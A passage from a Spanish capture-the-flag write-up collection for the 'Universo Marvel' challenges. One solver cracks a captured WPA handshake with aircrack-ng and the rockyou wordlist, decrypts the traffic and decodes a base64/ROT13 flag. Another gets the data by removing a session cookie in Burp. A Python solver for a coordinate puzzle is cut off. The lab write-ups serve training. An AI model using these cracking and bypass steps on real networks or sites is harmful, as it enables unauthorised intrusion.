84 | Dashboard: MRQXG2DCN5QXEZA=
85 | Calendario: MNQWYZLOMRQXE2LP
86 | Misiones: NVUXG2LPNZSXG===
87 | Ubicacion de la base: NVQXAYLT
88 |
89 | Intentamos descifrarlos/decodificarlos sin éxito, con todas las combinaciones de BAS/VIG/ROT/XOR que se nos ocurren... Pasamos mucho tiempo probando en cyberchef varios valores, con tipos de codificación y cifrado de pasadas UAM.
90 |
91 | Luego empezamos a ver las peticiones en el BURP y vamos probando a modificar peticiones, ya que la búsqueda de la codificación era bastante infructuosa.
92 |
93 | Después de varias pruebas llegamos a la definitiva:
94 | Quitamos el PHPSESSID con el burp mientras hacemos la petición de la Ubicación de la base.
95 | Devuelve este resultado(yuhu!):
96 | eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
97 |
98 | El "=" de relleno al final nos hace pensar que es base64.
99 | Nos vamos a cyberchef y descodificamos base64:
100 | https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&input=ZXlKSWIzWndibkIyWW1GeVppSTZJSHNLQ1NBZ0lDQWlUMjVtY2lCRFpYWmhjSFpqYm5raU9pQjdJQW9KSUNBZ0lDQWdJQ0FpUVdKNmIyVnlJam9nSWxabWVXNGdWV3h4Wlc0aUxBb0pJQ0FnSUNBZ0lDQWlVR0ppWlhGbUlqb2dJak0zd3JBeU1lS0Fza0VnTWpQQ3NESTQ0b0N5VWlJc0Nna2dJQ0FnZlN3S0NTQWdJQ0FpVDI1bWNpQkdjbkJsY21kdUlqb2dld29KSUNBZ0lDQWdJQ0FpUVdKNmIyVnlJam9nSWxONWJuUWlMQW9KSUNBZ0lDQWdJQ0FpVUdKaVpYRm1Jam9nSWtoT1duczBOamcyTTNFNU1qZzFPRzgwT0Rad01qbHpOelU1TnpZM2NqVXpjamt5YzMwaUxBb0pJQ0FnSUgwS0NYMD0
101 | {"Hovpnpvbarf": {
102 | "Onfr Cevapvcny": {
103 | "Abzoer": "Vfyn Ulqen",
104 | "Pbbeqf": "37°21′A 23°28′R",
105 | },
106 | "Onfr Frpergn": {
107 | "Abzoer": "Synt",
108 | "Pbbeqf": "HNZ{46863q92858o486p29s759767r53r92s}",
109 | }
110 | }
111 |
112 | Usamos un ROT13 sobre el string que parece una flag (y que de otras UAM nos suena HNZ rot13 de UAM)
113 | https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=SE5aezQ2ODYzcTkyODU4bzQ4NnAyOXM3NTk3NjdyNTNyOTJzfQ
114 |
115 | Hacemos ROT13 sobre todo el texto:
116 | https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0
117 | {"Ubicaciones": {
118 | "Base Principal": {
119 | "Nombre": "Isla Hydra",
120 | "Coords": "37°21′N 23°28′E",
121 | },
122 | "Base Secreta": {
123 | "Nombre": "Flag",
124 | "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
125 | }
126 | }
127 |
128 | Metemos la flag en el portal, segundo puesto! =)
129 | Esperamos a la segunda parte!!
130 |
131 | Gracias a los admin por la prueba, y enhorabuena a todos los que han pasado la prueba.
132 | masi.
133 |
134 | -------------------------------------------------------------------------------
135 | -------------------------------------------------------------------------------
136 | WRITE-UP 2018-12-19 EOF.
137 | -------------------------------------------------------------------------------
138 | -------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/nachinho3/nachinho3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/oreos/oreos-episodio1.docx:
--------------------------------------------------------------------------------
1 | UNA AL MES (Diciembre 2018)
2 | **************************************************************************
3 |
4 | Categoría: Universo Marvel
5 | Episodio: 1
6 |
7 | --------------------------------------------------------------------------
8 |
9 | 1. Descargamos el fichero pcap de google drive (https://drive.google.com/open?id=1ltE42DQvMe-q_qVBbgeKQXvvTEiRyhwq)
10 |
11 | 2. Observamos tráfico wireless 802.11. Buscamos un WPA-handshake con la herramienta aircrack-ng:
12 |
13 | oreos# aircrack-ng capture-01.cap
14 | Opening capture-01.cap
15 | Read 5786 packets.
16 |
17 | # BSSID ESSID Encryption
18 |
19 | 1 E0:91:53:45:EA:DD Hydra Corp WPA (1 handshake)
20 |
21 | Choosing first network as target.
22 |
23 | Opening capture-01.cap
24 | Please specify a dictionary (option -w).
25 |
26 |
27 | Quitting aircrack-ng...
28 |
29 | 3. Existe un WPA-handshake para el SSID "Hydra Corp" con BSSID "E0:91:53:45:EA:DD". Realizaremos un ataque de diccionario usando rockyou.txt. Se intuye que la clave se encontrará al final del diccionario, por lo que le damos la vuelta usando la herramienta 'tac':
30 |
31 | oreos# tac rockyou.txt > rockyou-rev.txt
32 |
33 | Lanzamos el ataque de diccionario con aircrack-ng:
34 |
35 | oreos# aircrack-ng -w rockyou-rev.txt -b E0:91:53:45:EA:DD capture-01.cap
36 |
37 | [00:14:17] 4868840/9822768 keys tested (5786.68 k/s)
38 |
39 | Time left: 14 minutes, 16 seconds 49.57%
40 |
41 | KEY FOUND! [ hydra54321 ]
42 |
43 |
44 | Master Key : 7F B1 AE 7F BB F1 A7 AF 5E D5 1B D3 17 1F E7 61
45 | 9C 5F 54 58 44 CD 57 5C A8 B8 B0 0E F6 1E 3B 62
46 |
47 | Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
51 |
52 | EAPOL HMAC : 8D 07 1F AA BB 62 2B 05 41 A2 82 60 33 80 DA 16
53 |
54 | Encontramos la clave, 'hydra54321'.
55 |
56 | Obtenemos el PSK a partir del SSID y la passphrase con la siguiente herramienta online, para descifrar el tráfico en Wireshark (https://www.wireshark.org/tools/wpa-psk.html)
57 |
58 | Passphrase: hydra54321
59 | SSID: Hydra Corp
60 | PSK: 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
61 |
62 | 5. Insertamos el PSK en wireshark (Edit -> Preferences -> Protocols > 802.11):
63 |
64 | wpa-psk - 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
65 |
66 | 6. Filtramos el tráfico 'http', y observamos accesos a una URL web a atacar.
67 |
68 | 7. Tras rastrear la web, encontramos un enlace que nos generará la ubicación de la Isla Hydra: http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT
69 |
70 | Probamos a descargarla con 'curl' y observamos una cadena codificada en Base64.
71 |
72 | oreos# curl http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT
73 |
74 | eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
75 |
76 | 8. Usaremos la herramienta 'autodecoder' para decodificar/desencriptar el mensaje:
77 |
78 | oreos# git clone https://github.com/oreosES/autodecoder.git
79 | oreos# python3 autodecoder.py -m eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0= -l 2
80 |
81 |
82 | (
83 | ( ( )\ ) (
84 | )\ ( )\ ) (()/( ( )\ ) ( (
85 | ((((_)( ))\ (()/( ( /(_)) ))\ ( ( (()/( ))\ )(
86 | )\ _ )\ /((_) ((_)) )\(_))_ /((_) )\ )\ ((_))/((_)(()\
87 | (_)_\(_)(_))( _| | ((_)| \ (_)) ((_)((_) _| |(_)) ((_)
88 | / _ \ | || |/ _` |/ _ \| |) |/ -_)/ _|/ _ \/ _` |/ -_) | '_|
89 | /_/ \_\ \_,_|\__,_|\___/|___/ \___|\__|\___/\__,_|\___| |_|
90 |
91 | Author: oreos | Twitter: @oreos_ES
92 |
93 |
94 | base64 > atbash: SLEKMKEYZIULMUIXVEZKEXMBZYALVIEUBMFOJVMKYYVJUZILMUIUIKVITMZYALVIHBMGKYYVJUSMAJLKHIIH
95 | base64 > baconian: RZ
96 | base64 > caesar: {"KXEYWYEKJAO": {
97 | "RWOA FNEJYELWH": {
98 | "DKIXNA": "YOHW XU@NW",
99 | "SKKN@O": "37°21′D 23°28′U",
100 | },
101 | "RWOA IAYNAPW": {
102 | "DKIXNA": "VHWC",
103 | "SKKN@O": "KQC{46863@92858X486Y29B759767A53A92B}",
104 | }
105 | }
106 | base64 > rot13: {"Ubicaciones": {
107 | "Base Principal": {
108 | "Nombre": "Isla Hydra",
109 | "Coords": "37°21′N 23°28′E",
110 | },
111 | "Base Secreta": {
112 | "Nombre": "Flag",
113 | "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
114 | }
115 | }
116 | base64 > rot47: LQw@GA?AG32C7Qi L
117 | Q~?7C r6G2AG4?JQi L
118 | Qp3K@6CQi Q'7J? &=B6?Q[
119 | Q!336B7Qi Qbf°a`′p ab°ag′#Q[
120 | N[
121 | Q~?7C uCA6C8?Qi L
122 | Qp3K@6CQi Q$J?EQ[
123 | Q!336B7Qi Qw}+LcegebBhagdg@cgeAahDfdhfefCdbChaDNQ[
124 | N
125 | N
126 | atbash > atbash: EYJIBZWBNBYMFYZIIIHSKCSAGICAITMCIBDZXZHCHZJBNKIOIBIAOJICAGICAGICAIQWJBVYIJOGILZMEWGVWXXZWILAOJICAGICAGICAIUGJIZXFMIJOGIJMWRAYMEKASKEGMJPCSDIOCYUIISCGKGICAGFSWKCSAGICAITMCIBGCNBLCMDUIJOGEWOJICAGICAGICAIQWJBVYIJOGILNBNQILAOJICAGICAGICAIUGJIZXFMIJOGIKHOWNSNJGMEMJGOGODZWMJLZNZUNZYCJUZCJKYCILAOJICAGIHKCX
127 | atbash > baconian: WCHA
128 | atbash > caesar: YETUBDGBPBEQXEDUUUVKSAKCWUACUJQAUBZDFDVAVDTBPSUOUBUCOTUACWUACWUACUMGTBHEUTOWURDQYGWHGFFDGURCOTUACWUACWUACUIWTUDFXQUTOWUTQGLCEQYSCKSYWQTNAKZUOAEIUUKAWSWUACWXKGSAKCWUACUJQAUBWAPBRAQZIUTOWYGOTUACWUACWUACUMGTBHEUTOWURPBPMURCOTUACWUACWUACUIWTUDFXQUTOWUSVOGPKPTWQYQTWOWOZDGQTRDPDIPDEATIDATSEAURCOTUACWUVSAF
129 | atbash > rot13: IODELNQLZLOAHONEEEFUCKUMGEKMETAKELJNPNFKFNDLZCEYELEMYDEKMGEKMGEKMEWQDLROEDYGEBNAIQGRQPPNQEBMYDEKMGEKMGEKMESGDENPHAEDYGEDAQVMOAICMUCIGADXKUJEYKOSEEUKGCGEKMGHUQCKUMGEKMETAKELGKZLBKAJSEDYGIQYDEKMGEKMGEKMEWQDLROEDYGEBZLZWEBMYDEKMGEKMGEKMESGDENPHAEDYGECFYQZUZDGAIADGYGYJNQADBNZNSZNOKDSNKDCOKEBMYDEKMGEFCKP
130 | atbash > rot47: 'q"#*ps*|*q}&qp###$w!)w+%#)+#v})#*(prp$)$p"*|!#{#*#+{"#)+%#)+%#)+#ys"*tq#"{%#~p}'s%tsrrps#~+{"#)+%#)+%#)+#u%"#pr&}#"{%#"}sx+q}'!+w!'%}"z)w(#{)qu##w)%!%#)+%&ws!)w+%#)+#v})#*%)|*~)}(u#"{%'s{"#)+%#)+%#)+#ys"*tq#"{%#~|*|y#~+{"#)+%#)+%#)+#u%"#pr&}#"{%#!${s|w|"%}'}"%{%{(ps}"~p|pu|pq)"up)"!q)#~+{"#)+%#$!)r
131 | baconian > atbash: VZTTZ
132 | baconian > caesar: HDJJD
133 | baconian > rot13: RNTTN
134 | baconian > rot47: tpvvp
135 | caesar > atbash: MSNOPXUPDVYERSXIOOPYMUEWKOUWIDEOIVTXZXJOPXHPDGIIIVOWCNOUWKOUWKOUWIGANPBSOHCKOFXEMAKBATTXAILWCNOUWKOUWKOUWICQNIXZREOHCKOHKUZWSKMMWYGSKKHHUYTOCUSCIOYUKGKOUWKLEUMUEWKOUWIDEOIVQODVFOENWOHCKMUCNOUWKOUWKOUWIGANPBSOHCKOFJPDGILWCNOUWKOUWKOUWICQNIXZREOHCKOGJIADYJHKKSKHKIQITXUKHFRJRCJRYOHCROHGSOILWCNOUWKOPMUZ
136 | caesar > baconian: Y
137 | caesar > caesar: QKPON3FINZH2EYLKFUO6ONEQIYGSOIGUZ25YOUHJFDFTONFVNZWUUUH7OGAPOIGSOIGSOIGUWCP6N2BKOVASOXFYQC4SBCJJFC4URGAPOIGSOIGSOIGUAMPUFDLYOVASOVS3IDGKSQQGEWKSSVVIEJO44AIKAUOEISWSOIGSRYIQIYGSOIGUZ25YOUHMOZHXOYPGOVASQIAPOIGSOIGSOIGUWCP6N2BKOVASOXT5NZWURGAPOIGSOIGSOIGUAMPUFDLYOVASOWTUCZE0TVS2S3K5SVS1UM80UJFISVXLTLA5TLE3OVALOVWKO30URGAPOIGSON0QID0=
138 | caesar > rot13: AUZYX3PSXJR2OIVUPEY6YXOASIQCYSQEJ25IYERTPNPDYXPFXJGEEER7YQKZYSQCYSQCYSQEGMZ6X2LUYFKCYHPIAM4CLMTTPM4EBQKZYSQCYSQCYSQEKWZEPNVIYFKCYFC3SNQUCAAQOGUCCFFSOTY44KSUKEYOSCGCYSQCBISASIQCYSQEJ25IYERWYJRHYIZQYFKCASKZYSQCYSQCYSQEGMZ6X2LUYFKCYHD5XJGEBQKZYSQCYSQCYSQEKWZEPNVIYFKCYGDEMJO0DFC2C3U5CFC1EW80ETPSCFHVDVK5DVO3YFKVYFGUY30EBQKZYSQCYX0ASN0=
139 | caesar > rot47: }w|{zbruz(taq'xwr#{e{zq}u's!{us#(ad'{#tvrpr"{zr$z(%###tf{s)|{us!{us!{us#%+|eza*w{$)!{&r'}+c!*+vvr+c#~s)|{us!{us!{us#)y|#rpx'{$)!{$!bupsw!}}sq%w!!$$uqv{cc)uw)#{qu!%!{us!~'u}u's!{us#(ad'{#ty{(t&{'|s{$)!}u)|{us!{us!{us#%+|eza*w{$)!{&"dz(%#~s)|{us!{us!{us#)y|#rpx'{$)!{%"#+(q_"$!a!bwd!$!`#yg_#vru!$&x"x)d"xqb{$)x{$%w{b_#~s)|{us!{z_}up_l
140 | rot13 > atbash: IODELNQLZLOAHONEEEFUCKUMGEKMETAKELJNPNFKFNDLZCEYELEMYDEKMGEKMGEKMEWQDLROEDYGEBNAIQGRQPPNQEBMYDEKMGEKMGEKMESGDENPHAEDYGEDAQVMOAICMUCIGADXKUJEYKOSEEUKGCGEKMGHUQCKUMGEKMETAKELGKZLBKAJSEDYGIQYDEKMGEKMGEKMEWQDLROEDYGEBZLZWEBMYDEKMGEKMGEKMESGDENPHAEDYGECFYQZUZDGAIADGYGYJNQADBNZNSZNOKDSNKDCOKEBMYDEKMGEFCKP
141 | rot13 > baconian: H ZZ
142 | rot13 > caesar: AUZYX3PSXJR2OIVUPEY6YXOASIQCYSQEJ25IYERTPNPDYXPFXJGEEER7YQKZYSQCYSQCYSQEGMZ6X2LUYFKCYHPIAM4CLMTTPM4EBQKZYSQCYSQCYSQEKWZEPNVIYFKCYFC3SNQUCAAQOGUCCFFSOTY44KSUKEYOSCGCYSQCBISASIQCYSQEJ25IYERWYJRHYI@QYFKCASKZYSQCYSQCYSQEGMZ6X2LUYFKCYHD5XJGEBQKZYSQCYSQCYSQEKWZEPNVIYFKCYGDEMJO0DFC2C3U5CFC1EW80ETPSCFHVDVK5DVO3YFKVYFGUY30EBQKZYSQCYX0ASN0=
143 | rot13 > rot13: eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
144 | rot13 > rot47: C=('@b|;@2~a{K$=|G'e'&7)!u}E'!}GvadKAG~"|z|FA&|H@2IGqG~f'}3('!}E'!}E'!}Gsy(e@ax='H3E'J|KCycExy<<|ycG*}3('!}E'!}E'!}Gw%(G|z$K'H3E'H+b;6}=+C)}7I#E+Hr!7"'cc3!=wG'7!EIE'!}EDu;)!u}E'!}GvadKAG~%A2~JAKB9'H3EC;3('!}E'!}E'!}Gsy(e@ax='H3E'Jpd@2sG*}3('!}E'!}E'!}Gw%(G|z$K'H3E'IFqy27_pHEa+b#d+HE`q%g_q"|;+HJ>p>wdp>{bAHw>AHI=Ab_G*}3('!}E'&_)!z_l
145 | rot47 > atbash: QBCYSJZFQCVCDWAIKCIKZWJHDJUCKBCIKCIKCIKBVZQCCXRRXKBCIKCIKCIKEBFCCYSXKQAKWGIWHCXXIQCWICIKSAIKCIKZWJEJUCSBCIKCIKCIKBVZQCCWKBCIKCIKCIKEBFCCWZYGWETHSPPWPYPQYKBCIKCDAIO
146 | rot47 > baconian: RD
147 | rot47 > caesar: 6MHG3K+K3?@J*>DM+:GNGFGIA$Y8GAY:%JM>4:@B+)+94F+;3?<:~:@OGY@HGAY8GAY8GAY:"(HN3J'MG;@8G=+>6(L8'(LL+(L:{Y@HGAY8GAY8GAY:&EH:+)D>G;@8G;|KKFYM|6IYG4:@E4?@=4>5IG;@86K@HGAY8GAY8GAY:"(HN3J'MG;@8G=}M3?":{Y@HGAY8GAY8GAY:&EH:+)D>G;@8G<9~(?G_};8J|KCM|;8`~EP_~B+K|;=N}N&M}N*K4;&N4; rot13: 6Wlk3o+U3?dn*>hW+:krkjQme$c8kec:%nq>4:df+)+94j+;3?<:~:dskc@lkec8kec8kec:"(lr3n'Wk;@8k=+>6(p8'(VV+(p:{c@lkec8kec8kec:&il:+)h>k;@8k;|oUPcW|6mcQ4:di4?d=4>5Sk;@86U@lkec8kec8kec:"(lr3n'Wk;@8k=}q3?":{c@lkec8kec8kec:&il:+)h>k;@8k<9~(?Q_};8n|ogq|;8`~it_~f+U|;=X}X&q}X*o4;&X4; rot47: eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
150 |
151 | 9. La combinación 'base64 > rot13' nos muestra la flag:
152 |
153 | UAM{46863d92858b486c29f759767e53e92f}
154 |
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/rafamartos/rafamartos-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/rafamartos/rafamartos-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/victormanuelleyva/victormanuelleyva-episodio1.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/victormanuelleyva/victormanuelleyva-episodio1.txt
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/arsenics/arsenics-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/arsenics/arsenics-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/asterixco/asterixco-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/asterixco/asterixco-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/bicacaro/bicacaro-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/bicacaro/bicacaro-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/darkeagle/darkeagle-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/julianjm/julianjm-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/julianjm/julianjm-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/arsenics/arsenics-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/arsenics/arsenics-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/bechma/bechma-episdio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/bechma/bechma-episdio3.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/bicacaro/bicacaro-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/coordenades.txt:
--------------------------------------------------------------------------------
1 | -51.2263816202, 8.10899805433
2 | -3.396936473, 7.87198824054
3 | 45.1590246548, 7.93243330727
4 | 45.7384951953, -73.2066721802
5 | -3.42714386964, -72.9107266853
6 | -2.77172800229, 7.52185701112
7 | 19.1399952, -72.3570972
8 | 44.5607307927, -73.0205921546
9 | 43.6100611723, 6.58946301884
10 | -2.73141067245, 8.27764655993
11 | -50.3213413202, 7.07393246568
12 | -51.2758314025, -73.091160021
13 | -2.47453022387, -72.4698275544
14 | 44.2979255136, -72.4873645117
15 | 19.1399952, -72.3570972
16 | -50.505288471, 7.6154200698
17 | -2.77032857828, 8.45085972386
18 | 43.3953722545, 7.12287052714
19 | 45.8072900754, -73.1907339308
20 | -2.95197936965, -72.2507948297
21 | -3.37159885987, 7.61851969812
22 | 19.1399952, -72.3570972
23 | 44.9471915554, -71.7312374845
24 | 43.434079994, 7.05564264826
25 | -3.77755921359, 7.3140029803
26 | -2.1765448219, -72.9980908924
27 | 45.5157039055, -72.0750205454
28 | -2.6665636247, -71.758301384
29 | -52.4282156352, -73.7745944789
30 | -50.711316091, 8.37083156669
31 | -2.51838084051, 7.54880895033
32 | 19.1399952, -72.3570972
33 | 45.0778663225, -72.5092560673
34 | -3.09237153981, -71.5875397405
35 | -2.54013043815, 8.29075062273
36 | -51.2650141235, 7.38182033986
37 | -51.3843804847, -72.6927837569
38 | -3.47113449173, -73.2910711802
39 | 19.1399952, -72.3570972
40 | 43.951979572, 7.34734479231
41 | 45.0774665767, -72.6653555968
42 | -1.64013868935, -71.880258046
43 | -2.5651543193, 7.15699499792
44 | -51.1302541808, 6.61409584651
45 | -51.6645314915, -72.2889667536
46 | 19.1399952, -72.3570972
47 | -50.9537618541, 7.86695357465
48 | -3.39854486395, 7.54749242771
49 | 44.1875549665, 8.41825012463
50 | 44.5392940445, -72.5272725636
51 | -2.11328803913, -71.5479514771
52 | -3.68109586997, 8.3987557492
53 | 19.1399952, -72.3570972
54 | -50.3640122893, 7.42600497636
55 | -3.20207550584, 8.67050872668
56 | 43.7000729441, 6.93679182633
57 | 45.0580573149, -71.7938069637
58 | -3.31919012843, -72.2350798982
59 | -3.46384596989, 8.17271197177
60 | 19.1399952, -72.3570972
61 | 44.2842879927, -72.7735510253
62 | -3.32885065011, -73.176847501
63 | -2.4505637663, 7.42942648896
64 | 44.4455780729, 8.40633450195
65 | -2.42629846443, 8.67464696509
66 | -51.6986157517, 6.67583285244
67 | 19.1399952, -72.3570972
68 | 44.6513902796, 8.20328564618
69 | -3.53964840101, 7.99538219466
70 | -51.2036099499, 6.99221399195
71 | 19.1399952, -72.3570972
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/darkeagle/darkeagle-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/solve_final.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | from gmplot import gmplot
3 | import csv
4 | import sys
5 | # Us: python solve_final.py fitxer_coordenades.txt
6 |
def banner():
    """Print the tool's ASCII-art banner and author line to stdout.

    The art is one double-quoted literal continued across lines with a
    trailing backslash; the alignment shown here may not match the file
    exactly.
    """
    # NOTE(review): sequences such as "\_" and "\ " inside the literal are
    # not valid escapes (Python keeps the backslash but newer versions warn);
    # a raw triple-quoted string would express the same art more safely.
    print("\n\
\n\
/$$$$$$ /$$$$$$$ /$$ \n\
/$$__ $$ | $$__ $$ | $$ \n\
| $$ \__/ /$$$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ \n\
| $$ /$$$$ /$$__ $$ /$$__ $$ | $$ | $$ /$$__ $$ /$$_____/ /$$__ $$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$ /$$__ $$ \n\
| $$|_ $$| $$$$$$$$| $$ \ $$ | $$ | $$| $$$$$$$$| $$ | $$ \__/| $$ | $$| $$ \ $$ | $$ | $$$$$$$$| $$ \__/ \n\
| $$ \ $$| $$_____/| $$ | $$ | $$ | $$| $$_____/| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ \n\
| $$$$$$/| $$$$$$$| $$$$$$/ | $$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$$$$$$| $$$$$$$/ | $$$$/| $$$$$$$| $$ \n\
\______/ \_______/ \______/ |_______/ \_______/ \_______/|__/ \____ $$| $$____/ \___/ \_______/|__/ \n\
/$$ | $$| $$ \n\
| $$$$$$/| $$ \n\
\______/ |__/ \n\
Author: DarkEagle\n\n\n")
22 |
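def separar(path=None, marker='19.1399952, -72.3570972'):
    """Split a coordinate file into numbered block files at each marker line.

    Every run of lines between two occurrences of ``marker`` is written to
    ``<n>bloc.txt`` in the current working directory, numbered from 1.

    Args:
        path: File to split. When omitted, falls back to the ``--file``
            argument parsed at module level (``args.file``), which is what
            the original, parameterless version read.
        marker: The coordinate line that separates two blocks (the point that
            repeats in the challenge data and marks the "next digit").

    Returns:
        The number of block files written.

    Notes:
        Lines after the last marker are discarded, as before (there is no
        closing marker for them). Blank lines are skipped so that the CSV
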